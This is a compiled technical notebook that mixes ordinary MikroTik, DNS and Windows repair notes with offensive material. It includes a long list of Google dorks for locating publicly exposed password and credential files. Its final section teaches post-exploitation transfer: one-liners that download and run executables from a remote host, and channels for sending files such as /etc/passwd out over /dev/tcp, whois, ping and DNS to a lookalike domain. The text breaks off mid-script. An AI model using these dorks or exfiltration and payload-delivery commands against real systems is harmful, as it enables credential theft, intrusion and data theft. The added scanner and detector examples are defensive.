Google dorks for finding files that contain passwords:

"cpanel username" "cpanel password" ext:txt
"insert into users" "VALUES" ext:sql | ext:txt | ext:log | ext:env
"password 7" ext:txt | ext:log | ext:cfg
intitle:"index of" "idx_config"
"mailer_password:" + "mailer_host:" + "mailer_user:" + "secret:" ext:yml
intext:construct('mysql:host
"keystorePass=" ext:xml | ext:txt -git -gitlab
"define('SECURE_AUTH_KEY'" + "define('LOGGED_IN_KEY'" + "define('NONCE_KEY'" ext:txt | ext:cfg | ext:env | ext:ini
intitle:"index of" "anaconda-ks.cfg" | "anaconda-ks-new.cfg"
"define('DB_USER'," + "define('DB_PASSWORD'," ext:txt
intitle:"index of" "config.exs" | "dev.exs" | "test.exs" | "prod.secret.exs"
jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab
jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab
jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab
"spring.datasource.password=" + "spring.datasource.username=" ext:properties -git -gitlab
ext:log password END_FILE
site:pastebin.com intext:admin.password
"db.username" + "db.password" ext:properties
ext:cfg "g_password" | "sv_privatepassword" | "rcon_password" -git -gitlab
"server.cfg" ext:cfg intext:"rcon_password" -git -gitlab
"anaconda-ks.cfg" | "ks.cfg" ext:cfg -git -gitlab
rootpw --iscrypted ext:cfg
"admin_password" ext:txt | ext:log | ext:cfg
"index of" "password.ini"
filetype:log intext:password after:2015 intext:@gmail.com | @yahoo.com | @hotmail.com
"'username' =>" + "'password' =>" ext:log
ext:txt intext:@yahoo.com intext:password
intitle:"database.php" inurl:"database.php" intext:"db_password" -git -gitlab
ext:xls intext:@gmail.com intext:password
"POSTGRES_PASSWORD=" ext:txt | ext:cfg | ext:env | ext:ini | ext:yml | ext:sql -git -gitlab
"/** MySQL database password */" ext:txt | ext:cfg | ext:env | ext:ini
"EMAIL_HOST_PASSWORD" ext:yml | ext:env | ext:txt | ext:log
allintext:"redis_password" ext:env
intext:"db_database" ext:env intext:"db_password"
"Index of" "/yahoo_site_admin/credentials"
allintext:password filetype:log
inurl:logs intext:GET https:// ext:txt intext:password intext:username
intitle:"index of" "/master.passwd"
"MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
filetype:env "DB_PASSWORD"
"index of" ".env"
intext:"Index of /password"
"config.php.bak" intitle:"index of"
intitle:"index of" "config.neon" OR "config.local.neon"
intitle:"index of" "passwords.xlsx"
inurl:*helpdesk* intext:"your default password is"
"MasterUserPassword" ext:cfg OR ext:log OR ext:txt -git
"/etc/shadow root:$" ext:cfg OR ext:log OR ext:txt OR ext:sql -git
intitle:"index of " "*.passwords.txt"
"admin password irreversible-cipher" ext:txt OR ext:log OR ext:cfg
"super password level 3 cipher" ext:txt OR ext:log
intitle:"index of" "db.ini"
intitle:"index of" "database.ini" OR "database.ini.old"
intitle:"index of" application.ini
intitle:"index of" "db.connection.js"
"d-i passwd/root-password-crypted password" ext:cfg
"configure account user encrypted" ext:cfg
"create account" admin ext:cfg
password console-password ext:cfg -git
"enable password" ext:cfg -git -cisco.com
intitle:"Index of" dbconnect.inc
intext:authentication set encrypted-password ext:cfg
intitle:"index of" "passwords.yml"
intitle:"index of" "credentials.yml"
intext:"WPENGINE_SESSION_DB_USERNAME" || "WPENGINE_SESSION_DB_PASSWORD"
intext:"username=" AND "password=" ext:log
intitle:index.of "creds.txt"
intitle:"index of" share.passwd OR cloud.passwd OR ftp.passwd -public
intitle:"index of" "db.conf"
intitle:"Index of" password.txt
"contrasena" filetype:sql -github.com
intext:"@gmail.com" intext:"password" inurl:/files/ ext:txt
intitle:"index of" "ftp.passwd"
intitle:"index of" "htpasswd.txt"
"pass" "usuario" filetype:sql
intext:"aspx" filetype:txt login & password
inurl:users.json + "username"
intext:"wordpress" filetype:xls login & password
s3 site:amazonaws.com filetype:xls password
inurl:login.txt filetype:txt
inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner
intitle:settings.py intext:EMAIL_USE_TLS -git -stackoverflow
intitle:settings.py intext:EMAIL_HOST_PASSWORD -git -stackoverflow
username | password inurl:resources/application.properties -github.com -gitlab
filetype:xml config.xml passwordHash Jenkins
intext:jdbc:oracle filetype:java
filetype:txt $9$ JunOS
filetype:reg reg HKEY_CURRENT_USER intext:password
inurl:"standalone.xml" intext:"password>"
/_wpeprivate/config.json
inurl:"build.xml" intext:"tomcat.manager.password"
intitle:"index of" intext:login.csv
inurl:"trello.com" and intext:"username" and intext:"password"
inurl:"wp-license.php?file=../..//wp-config"
"battlefield" "email" site:pastebin.com
inurl:wp-config.bak
intext:"rabbit_password" | "service_password" filetype:conf
"whoops! there was an error." "db_password"
intext:"login" department | admin | manager | company | host filetype:xls | xlsx -community -github
intext:"please change your" password |code | login file:pdf | doc | txt | docx -github
inurl:configuration.php and intext:"var $password="
inurl:/dbcp.properties + filetype:properties -github.com
intext:define('AUTH_KEY',     ' wp-config.php filetype:txt
inurl:wp-config-backup.txt
"password.xlsx" ext:xlsx
filetype:env intext:REDIS_PASSWORD
intitle:"index.of" inurl:"cvs" login | passwd | password | access | pass -github -pub
site:showmyhomework.co.uk/school/homeworks/ "password"
filetype:doc inurl:"gov" intext:"default password is"
site:trello.com intext:mysql AND intext:password -site:developers.trello.com -site:help.trello.com
intext:"PuTTY log" ext:log "password" -supportforums -github
inurl:"/App.Config" + ext:config + "password=" -github -git
intitle:"Index of" intext:"Login Data"
inurl:"servlet/ViewFormServlet?" "pwd"
Codeigniter filetype:sql intext:password | pwd intext:username | uname intext: Insert into users values
intitle:"index.of" "places.sqlite" "Mail" thunderbird -mozilla.org -scan
ext:ini Robust.ini filetype:ini "password"
filetype:config "" "password" "web.config" -stackoverflow -youtube.com -github
intitle:"index.of" "places.sqlite" "key3.db" -mozilla.org
inurl:"config.xml" "password" ext:xml -stackoverflow.com -github.com
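The dorks above only work because the files were published first. The following script is an added example (not part of the original list or its source) that runs the same indicators locally over a web root before it is exposed: file names the "index of" dorks hunt for, and content markers such as DB_PASSWORD=, spring.datasource.password= or rcon_password. The sample files it builds in a temporary directory are constructed here for the demonstration; point scan_tree() at a real document root instead.

```python
"""Local counterpart of the password dorks: look for the same indicators in a
directory tree before a search engine does. Added example, not page code."""
import os
import re
import tempfile

# Content markers lifted from the dork list: (label, regex)
CONTENT_PATTERNS = [
    ("wordpress-db", re.compile(r"define\(\s*'DB_PASSWORD'\s*,", re.I)),
    ("spring-datasource", re.compile(r"^spring\.datasource\.password\s*=", re.I | re.M)),
    ("dotenv-db", re.compile(
        r"^(DB_PASSWORD|POSTGRES_PASSWORD|MYSQL_ROOT_PASSWORD|REDIS_PASSWORD|EMAIL_HOST_PASSWORD)\s*=",
        re.M)),
    ("jdbc-url", re.compile(r"jdbc:(oracle|postgresql|mysql):", re.I)),
    ("game-rcon", re.compile(r"^(rcon_password|sv_privatepassword|g_password)\b", re.I | re.M)),
    ("cisco-enable", re.compile(r"^\s*enable (password|secret)\b", re.M)),
    ("sql-users-insert", re.compile(r"insert\s+into\s+users\b.*\bvalues\b", re.I | re.S)),
    ("shadow-dump", re.compile(r"^root:\$[0-9a-z]+\$", re.M)),
]

# File names the "index of" dorks look for
NAME_PATTERNS = re.compile(
    r"^(\.env|wp-config\.php(\.bak)?|wp-config-backup\.txt|config\.php\.bak|"
    r"htpasswd\.txt|master\.passwd|ftp\.passwd|creds\.txt|passwords?\.(txt|xlsx|yml)|"
    r"credentials\.yml|db\.ini|database\.ini(\.old)?|anaconda-ks\.cfg|ks\.cfg|"
    r"server\.cfg|standalone\.xml|settings\.py)$", re.I)


def scan_file(path):
    """Return the list of indicator labels that fire for one file."""
    hits = []
    if NAME_PATTERNS.match(os.path.basename(path)):
        hits.append("sensitive-filename")
    try:
        with open(path, "r", errors="replace") as fh:
            text = fh.read(1_000_000)  # cap the read so huge logs stay cheap
    except OSError:
        return hits
    for label, rx in CONTENT_PATTERNS:
        if rx.search(text):
            hits.append(label)
    return hits


def scan_tree(root):
    """Map relative path -> labels for every file under root that fires."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def demo():
    """Build a constructed web root (sample data, not real secrets) and scan it."""
    samples = {
        "app/.env": "APP_ENV=prod\nDB_PASSWORD=s3cr3t\nREDIS_PASSWORD=abc\n",
        "app/config/application.properties":
            "spring.datasource.url=jdbc:mysql://localhost:3306/app\n"
            "spring.datasource.username=app\nspring.datasource.password=hunter2\n",
        "site/wp-config.php.bak": "<?php\ndefine('DB_USER', 'wp');\ndefine('DB_PASSWORD', 'pw');\n",
        "game/server.cfg": "hostname \"srv\"\nrcon_password \"letmein\"\n",
        "site/index.html": "<html><body>hello</body></html>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, labels in sorted(demo().items()):
        print(f"{path}: {', '.join(labels)}")
```

Every file flagged by the run is one a dork in the list above would surface once it sits under a directory listing or gets indexed; the clean index.html produces no entry.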

Source: https://www.boxpiper.com/posts/google-dork-list-files-password

Creating OpenVPN certificates on MikroTik

In the MikroTik console, enter:

/certificate

CA (key usage limited to signing certificates and CRLs):

add name=ca-template common-name=CA-OVPN days-valid=3650 key-size=2048 key-usage=crl-sign,key-cert-sign
sign ca-template name=CA-OVPN

SERVER (afterwards select this certificate in the OVPN server configuration):

add name=server-template common-name=SERVER-OVPN days-valid=3650 key-size=2048 key-usage=digital-signature,key-encipherment,tls-server
sign server-template name=SERVER-OVPN ca=CA-OVPN

Clients (the sign step renames the entry, which is why the template name can be reused for each client):

add name=client-template common-name=cliente01 days-valid=3650 key-size=2048 key-usage=tls-client
sign client-template name=cliente01 ca=CA-OVPN
add name=client-template common-name=cliente02 days-valid=3650 key-size=2048 key-usage=tls-client
sign client-template name=cliente02 ca=CA-OVPN

Simple failover on MikroTik

Scenario:
Ether1 - main link (gateway 192.168.1.1)
Ether2 - secondary link (gateway 192.168.2.1)

Create the default routes:
/ip route
add dst-address=0.0.0.0/0 gateway=192.168.1.1 distance=1 comment=principal
add dst-address=0.0.0.0/0 gateway=192.168.2.1 distance=2 comment=secundario

Add a host route that pins each monitored IP to its own link, so the Netwatch probe below tests that link rather than whichever default route is currently active (choose monitor IPs your clients do not otherwise depend on, since all traffic to that IP is forced out the corresponding link):

add dst-address=208.67.222.222/32 gateway=192.168.1.1 scope=10 comment="Monitor Link Principal" check-gateway=ping
add dst-address=1.1.1.1/32 gateway=192.168.2.1 scope=10 comment="Monitor Link Secundario" check-gateway=ping

In Netwatch (/tool netwatch):
Host monitored for the main link: 208.67.222.222
Up:
/ip route enable [find comment="principal"]
/log info "Main link is back up"

Down:
/ip route disable [find comment="principal"]
/log error "Main link is down"

Host monitored for the secondary link: 1.1.1.1
Up:
/ip route enable [find comment="secundario"]
/log info "Secondary link is back up"

Down:
/ip route disable [find comment="secundario"]
/log error "Secondary link is down"

Cloudflare DNS servers

Cloudflare currently offers three pairs of resolvers with different levels of filtering. The procedure for configuring DNS on a PC or phone is the same in every case; just pick the pair whose filtering matches what you need:

1.1.1.1 and 1.0.0.1 - Cloudflare's standard resolver, with no extra filtering, but already supporting DNS over HTTPS;
1.1.1.2 and 1.0.0.2 - the same as above plus blocking of known malware domains;
1.1.1.3 and 1.0.0.3 - the same as the two above plus a built-in filter that blocks adult content.

To change it quickly on Windows, press "Windows + R" and type in the "Run" box: ncpa.cpl

On Linux: vim /etc/resolv.conf (on systems running systemd-resolved or NetworkManager this file is generated and will be overwritten; set the servers in that tool's configuration instead).

Source: https://olhardigital.com.br/dicas_e_tutoriais/noticia/como-usar-os-novos-servidores-dns-da-cloudflare/98896

Fixing the WMI "Invalid Namespace" error

First check whether the repository is consistent:

winmgmt /verifyrepository

Actions to try

First try the following actions to see if they resolve your issue:

a. Re-register all of the DLLs and recompile the .mof files in the wbem folder, then re-register the WMI service and provider. Save the following script as a .bat file and run it from a command prompt with administrative rights; it changes into C:\Windows\System32\Wbem itself.

@echo off
sc config winmgmt start= disabled
net stop winmgmt /y
%systemdrive%
cd %windir%\system32\wbem
for /f %%s in ('dir /b *.dll') do regsvr32 /s %%s
wmiprvse /regserver
winmgmt /regserver
sc config winmgmt start= auto
net start winmgmt
for /f %%s in ('dir /s /b *.mof *.mfl') do mofcomp %%s

b. Reboot the machine and test WMI

Next, check the repository for consistencies:

For Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2, you can run winmgmt /verifyrepository from a command prompt.
For Older OS like Windows XP and Windows Server 2003 run: WmiDiag tool with the checkconsistency option. For example: WmiDiag checkconsistency

If repository is found to be inconsistent:

SCRIPT (save as a .bat file; %%s is the batch-file form of the loop variable)

REM Check if WMI is functioning correctly or not
REM Get computername from WMI
wmic computersystem get name
IF %ERRORLEVEL% EQU 0 goto success
:failure

cd c:\windows\SysWOW64\WBEM

FOR /f %%s in ('dir /b /s *.dll') do regsvr32 /s %%s
Net stop /y winmgmt
FOR /f %%s in ('dir /b *.mof *.mfl') do mofcomp %%s
Net start winmgmt

goto end
:success
goto end
:end

===============================

a. For Vista and newer, run from elevated command prompt:

Winmgmt /salvagerepository

Note this command will take the content of the inconsistent repository and merge it into the rebuilt repository if it is readable

If the above doesn’t work, then run:

Winmgmt /resetrepository

Note this will reset repository to the initial state when the OS was first installed

For Windows XP and Windows Server 2003, there are no built in switches to rebuild the Repository, so you must do it manually.

Warning: Rebuilding the WMI repository has resulted in some 3rd party products not working until their setup is re-run & their MOF re-added back to the repository.

If /salvagerepository or /resetrepository does not resolve the issue, then manually rebuild repository:

Change startup type to Window Management Instrumentation (WMI) Service to disabled
Stop the WMI Service; you may need to stop IP Helper Service first or other dependent services before it allows you to stop WMI Service
Rename the repository folder:  C:\WINDOWS\system32\wbem\Repository to Repository.old
Open a CMD Prompt with elevated privileges
CD windows\system32\wbem
for /f %%s in ('dir /b /s *.dll') do regsvr32 /s %%s
Set the WMI Service type back to Automatic and start WMI Service
cd /d c:\  ((go to the root of the c drive, this is important))
for /f %%s in ('dir /s /b *.mof *.mfl') do mofcomp %%s
Reboot the server

Finally, install latest hotfixes for WMI as they can help prevent issue from recurring. If you continue to have recurring WMI repository corruption issues on same machine, please engage a Microsoft Support Engineer for further troubleshooting and assistance.

=====================================================

Note from the related Microsoft hotfix article (Windows System Resource Manager accounting): the computer must have the Terminal Services role and the Windows System Resource Manager feature installed, and must be restarted after the hotfix is applied. Back up the registry before changing it (Microsoft KB 322756 describes how). Two REG_DWORD values under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\WSRM\Parameters control the interval between the WMI polling queries, in seconds:

PollingInterval - interval between the WMI polling queries used by the Accounting feature; default 30 (30 seconds).
ClusterSvcStatusPollInterval - available after the hotfix is installed; default 300 (5 minutes).

Sources:

http://www.ittrainingday.com/2013/01/rebuilding-wmi-windows-management.html

http://blogs.technet.com/b/configmgrteam/archive/2009/05/08/wmi-troubleshooting-tips.aspx

http://msdn.microsoft.com/en-us/library/aa394603(VS.85).aspx

http://eskonr.com/2012/01/how-to-fix-wmi-issues-automatically/

http://eskonr.com/2009/03/how-to-troubleshoot-the-systems-which-has-wmi-issues-rebuild-wmi-repository/

Fixing time / time-zone problems on virtual servers

In some cases virtual servers in a Workgroup (not domain-joined) keep syncing their clock from the virtual hardware (CMOS) clock, and if the physical host is in another country the time ends up wrong. To fix this, follow these steps:

Open a command prompt as Administrator.

Configure an external time source and mark the machine as a reliable time source. Peers are separated by spaces; a comma introduces per-peer flags, so do not write "a.ntp.br, b.ntp.br":

w32tm /config /manualpeerlist:"a.ntp.br b.ntp.br" /syncfromflags:manual /reliable:yes /update

Restart the time service:

net stop w32time && net start w32time

Check the configured peers and their state:

w32tm /query /peers

Start a manual synchronization:

w32tm /resync /rediscover

If you get the error:

w32tm /query /peers

The following error occurred: Element not found. (0x80070490)

then the service is not registered; run:

w32tm /register

net stop w32time && net start w32time

This should resolve the clock divergence. If the hypervisor's guest tools are also forcing the host clock onto the VM, disable that synchronization as well, otherwise the two sources will keep fighting.

Windows Update reporting error 0x80070422

Error 0x80070422 is ERROR_SERVICE_DISABLED: the Windows Update service (wuauserv) is not allowed to start. If Windows shows it when trying to update, open Services (Start / Run / services.msc), make sure the "Windows Update" service startup type is not Disabled (set it to Manual or Automatic), stop the service, go to the folder c:\windows\SoftwareDistribution and remove its entire contents. Start the "Windows Update" service again and check that the "Windows Modules Installer" service is running too.
Search for updates again.

Blocking port scans on MikroTik

Port-scan blocking. The rule can be tuned; used as written below, a source IP that opens connections to different ports in quick succession (more than the connection limit within the rate limit window) is added to the Port_Scanner list and blocked for 30 minutes. You need to create an address list named "Whitelist" with the IPs that must never be blocked, and an interface list "WanInterfaces" containing the router's WAN interfaces:

Add port scanners to the block list:
/ip firewall filter add chain=input action=add-src-to-address-list tcp-flags=syn connection-limit=!3,32 protocol=tcp src-address-list=!Whitelist address-list=Port_Scanner address-list-timeout=30m connection-rate=0-4294967295 in-interface-list=WanInterfaces limit=1,1:packet log=yes log-prefix="=== Bloqueio de Scanner ==="

The rule above only adds the source IP to the "Port_Scanner" list; the following rule, which drops everything from IPs in that list, must be placed before it in the chain so that the offender's next connections are discarded:

Block offenders:
/ip firewall filter add chain=input action=drop src-address-list=Port_Scanner log=no log-prefix="=== Block Offenders ==="
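To see what the heuristic above actually catches before deploying it, the following added example (not from the original notes) runs the same idea offline: a source that hits two or more distinct destination ports within one second is flagged, whitelisted sources are skipped. The log lines are constructed here in the shape of RouterOS firewall log output (log=yes on the rule); the addresses, the window and the assumed log format are all assumptions of this example.

```python
"""Offline check of the port-scan heuristic: N distinct destination ports from
one source within a short window. Added example over constructed log lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample modelled on RouterOS firewall log lines (not a real capture)
SAMPLE_LOG = """\
jan/02 10:15:31 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 203.0.113.5:40001->198.51.100.1:22, len 60
jan/02 10:15:31 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 203.0.113.5:40002->198.51.100.1:23, len 60
jan/02 10:15:31 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 203.0.113.5:40003->198.51.100.1:80, len 60
jan/02 10:15:40 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 198.51.100.77:50000->198.51.100.1:443, len 60
jan/02 10:15:45 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 198.51.100.77:50001->198.51.100.1:443, len 60
jan/02 10:15:46 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 192.0.2.10:1111->198.51.100.1:22, len 60
jan/02 10:15:46 firewall,info input: in:ether1 out:(unknown 0), proto TCP (SYN), 192.0.2.10:1112->198.51.100.1:8291, len 60
"""

LINE_RX = re.compile(
    r"^(?P<ts>\w{3}/\d{2} \d{2}:\d{2}:\d{2}) firewall,info .*?proto TCP \(SYN\), "
    r"(?P<src>\d+\.\d+\.\d+\.\d+):\d+->(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)"
)

WHITELIST = {"192.0.2.10"}  # stands in for the "Whitelist" address list


def parse(line, year=2024):
    """Return (timestamp, src, dport) for a SYN log line, or None.
    RouterOS omits the year from the log, so one is supplied."""
    m = LINE_RX.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b/%d %H:%M:%S")
    return ts, m["src"], int(m["dport"])


def detect(lines, window=1.0, distinct_ports=2, whitelist=WHITELIST):
    """Return {src: timestamp of first offence} for sources that touched
    `distinct_ports` or more different destination ports within `window` seconds."""
    recent = defaultdict(deque)  # src -> deque of (ts, dport), oldest first
    offenders = {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, src, dport = rec
        if src in whitelist or src in offenders:
            continue  # already listed: the drop rule handles the rest
        q = recent[src]
        q.append((ts, dport))
        while (ts - q[0][0]).total_seconds() > window:
            q.popleft()  # slide the window
        if len({p for _, p in q}) >= distinct_ports:
            offenders[src] = ts
    return offenders


if __name__ == "__main__":
    for src, ts in detect(SAMPLE_LOG.splitlines()).items():
        print(f"{src} flagged at {ts:%H:%M:%S}")
```

The repeated connections from 198.51.100.77 to port 443 are not flagged (one port, and seconds apart), which is the distinction the firewall rule's connection-limit is meant to make; 192.0.2.10 scans two ports in the same second but is on the whitelist.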

Techniques for transferring files in the post-exploitation phase

Create an HTTP server
The commands below start an HTTP service serving the current directory on port 1337 (the busybox and IO::All one-liners use 8000 and 8080 as written).

python2:
python -m SimpleHTTPServer 1337

python3:
python3 -m http.server 1337

Ruby:
ruby -rwebrick -e 'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+:
ruby -run -e httpd . -p 1337

Perl (note that the IO::All variant executes any file marked executable that a client requests, so only run it on your own box):
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 ? "./$1 |" : $1) if /^GET \/(.*) / })'

PHP 5.4+:
php -S 0.0.0.0:1337

busybox httpd:
busybox httpd -f -p 8000

Download and run files from the HTTP server

Below are some ways to download and execute files from an HTTP server using only the tools that ship with Windows and Linux.

WINDOWS

powershell:
powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

Certutil:
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin:
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

regsvr32 does not save a file to disk: it fetches the URL and runs it as a COM scriptlet through scrobj.dll, so whatever name the URL carries, the content served must be a scriptlet (.sct), not a plain executable:

regsvr32:
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

LINUX

Curl (-O keeps the remote file name instead of writing to stdout):
curl -O http://1.2.3.4/backdoor

Wget:
wget http://1.2.3.4/backdoor

awk (needs gawk with /inet networking; fetches /secret.txt from 127.0.0.1:1337 and prints the raw response, headers included):

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

Use an HTTP server that accepts the PUT method

With nginx (dav_methods needs nginx built with ngx_http_dav_module, which the Debian/Kali nginx package includes):

mkdir -p /var/www/upload/ # create the upload directory
chown www-data:www-data /var/www/upload/ # give nginx write access
cd /etc/nginx/sites-available # nginx virtual host directory

# write the configuration to the file file_upload
cat <<'EOF' > file_upload
server {
    listen 8001 default_server;
    server_name kali;
    location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# configuration written
cd ../sites-enabled # enabled sites directory
ln -s /etc/nginx/sites-available/file_upload file_upload # enable file_upload
systemctl start nginx # start nginx

With Python:

For example, HTTPutServer.py (Python 3 version of the referenced snippet; it writes each uploaded file under its base name in the current directory):

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import os
import signal
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
from threading import Thread


class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers["Content-Length"])
        content = self.rfile.read(length)
        # Keep only the base name of the request path, so a client cannot
        # write outside the working directory with "../" in the URL
        name = os.path.basename(self.path)
        with open(name, "wb") as f:
            f.write(content)
        self.send_response(200)
        self.end_headers()


def run_on(host, port):
    print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(host, port))
    HTTPServer((host, port), PUTHandler).serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython3 {0} ip 1337 [more ports]".format(sys.argv[0]))
        sys.exit(1)
    host = sys.argv[1]
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[host, port_number])
            server.daemon = True  # Do not make us wait for you to exit
            server.start()        # start every listener, not only the last one
        signal.pause()  # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print("\nPython HTTP PUT Server stopped.")
        sys.exit(1)

How it runs:

$ python3 HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

Send files over HTTP PUT from Linux with curl (a URL ending in "/" makes curl append the local file name):

$ curl --upload-file secret.txt http://ip:port/

With wget (--body-file is the option that pairs with --method; --post-file would force POST):

$ wget --method=PUT --body-file=secret.txt http://ip:port/secret.txt

Windows PowerShell (-Raw keeps the file as one string instead of an array of lines):

$body = Get-Content -Raw secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method Put -Body $body

File transfer using Bash /dev/tcp

First open a listening port on the machine that will receive the file:

nc -lvnp 1337 > secret.txt

On the sending machine:

cat secret.txt > /dev/tcp/ip/port

File transfer using the SMB protocol

Create a simple SMB server. To set up the SMB server we use Impacket: https://github.com/SecureAuthCorp/impacket.

Impacket is installed by default on Kali Linux (smbserver.py, packaged as impacket-smbserver). Current Windows clients refuse SMB1, so add -smb2support.

Syntax: impacket-smbserver -smb2support ShareName SharePath
Example: impacket-smbserver -smb2support share `pwd`

Download files from the SMB server:

copy \\IP\ShareName\file.exe file.exe

Copy files to the SMB server:

net use x: \\IP\ShareName
copy file.txt x:
net use x: /delete

File transfer using the whois command:

Receiver, host B (the shell turns the newlines of the base64 output into spaces when it expands the backticks, which is why sed strips them before decoding):

nc -vlnp 1337 | sed "s/ //g" | base64 -d

Sender, from host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

File transfer using the ping command:

Receiver, host B:
Save the following as ping_receiver.py (needs scapy and root to sniff; adjust iface to your interface):

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(1)


def process_packet(pkt):
    # ICMP type 8 = echo request. ping -p repeats the 4-byte pattern across
    # the whole payload, so the last 4 bytes are one clean copy of it.
    if pkt.haslayer(ICMP) and pkt[ICMP].type == 8 and pkt.haslayer(Raw):
        data = pkt[Raw].load[-4:]
        print(data.decode("utf-8", "replace"), flush=True, end="")


sniff(iface="eth0", filter="icmp", prn=process_packet)

And run:

python3 ping_receiver.py

Sender, from host A (each line of xxd output is one 4-byte chunk in hex, sent as the ping pattern; the file size should be a multiple of 4 bytes, otherwise the last, shorter pattern is repeated inside the final 4 bytes):

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

File transfer using the dig command:

Receiver, host B:

The following code uses the Python scapy module, which has to be installed manually. It expects each query name to be a hex-encoded chunk as the first label followed by gooogle.com (e.g. 73656372.gooogle.com).

Save the code as dns_receiver.py:

import sys

try:
    from scapy.all import *
except ImportError:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(1)

EXFIL_DOMAIN = "gooogle.com."  # marker appended by the sender; trailing dot as seen in qname


def process_packet(pkt):
    # Only DNS queries (qr == 0) that carry a question section
    if pkt.haslayer(DNSQR) and pkt[DNS].qr == 0:
        domain = pkt[DNSQR].qname.decode("utf-8")
        label, _, rest = domain.partition(".")
        if rest == EXFIL_DOMAIN:
            print(bytes.fromhex(label).decode("utf-8", "replace"), flush=True, end="")


sniff(iface="eth0", filter="udp port 53", prn=process_packet)

And run it:

python3 dns_receiver.py
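The ping and dig carriers above share one encoding: the file is cut into 4-byte chunks, each chunk hex-encoded, and carried either as the ping pattern or as the first DNS label. The following added example (not from the original notes, and independent of scapy or any network) implements that encoding and the two receivers' decoding logic side by side, so the format can be checked offline, including the edge case where the file length is not a multiple of 4. The domain gooogle.com and the 56-byte ping payload are taken from the page's receiver and ping's default; everything else is an assumption of this example.

```python
"""Encoder/decoder for the ICMP (ping -p) and DNS (dig) exfil carriers.
Added example: mirrors ping_receiver.py and dns_receiver.py without scapy."""
import binascii

CHUNK = 4                      # bytes per ping pattern / per DNS label
EXFIL_DOMAIN = "gooogle.com"   # marker the DNS receiver keys on
PING_PAYLOAD = 56              # default ICMP payload size of ping


def chunk_hex(data: bytes):
    """Equivalent of `xxd -p -c 4`: yield one 8-hex-char string per 4 bytes."""
    for i in range(0, len(data), CHUNK):
        yield binascii.hexlify(data[i:i + CHUNK]).decode()


def icmp_patterns(data: bytes):
    """Values to pass to `ping -c 1 -p <pattern>`, one per packet."""
    return list(chunk_hex(data))


def dns_names(data: bytes):
    """Query names for the dig carrier: <hex>.gooogle.com."""
    return [f"{h}.{EXFIL_DOMAIN}" for h in chunk_hex(data)]


def icmp_payload(pattern_hex: str, size: int = PING_PAYLOAD) -> bytes:
    """What ping puts on the wire for -p: the pattern repeated to fill the payload."""
    pat = binascii.unhexlify(pattern_hex)
    return (pat * (size // len(pat) + 1))[:size]


def decode_icmp(payloads):
    """Receiver side for ICMP, exactly as ping_receiver.py does it: last 4 bytes
    of every echo-request payload, concatenated."""
    return b"".join(p[-CHUNK:] for p in payloads)


def decode_dns(qnames):
    """Receiver side for DNS: first label of each query under gooogle.com,
    hex-decoded; queries for other domains on the wire are ignored."""
    out = bytearray()
    for q in qnames:
        labels = q.rstrip(".").split(".")
        if ".".join(labels[1:]) != EXFIL_DOMAIN:
            continue
        out += binascii.unhexlify(labels[0])
    return bytes(out)


if __name__ == "__main__":
    secret = b"secret!\n"                     # constructed sample content
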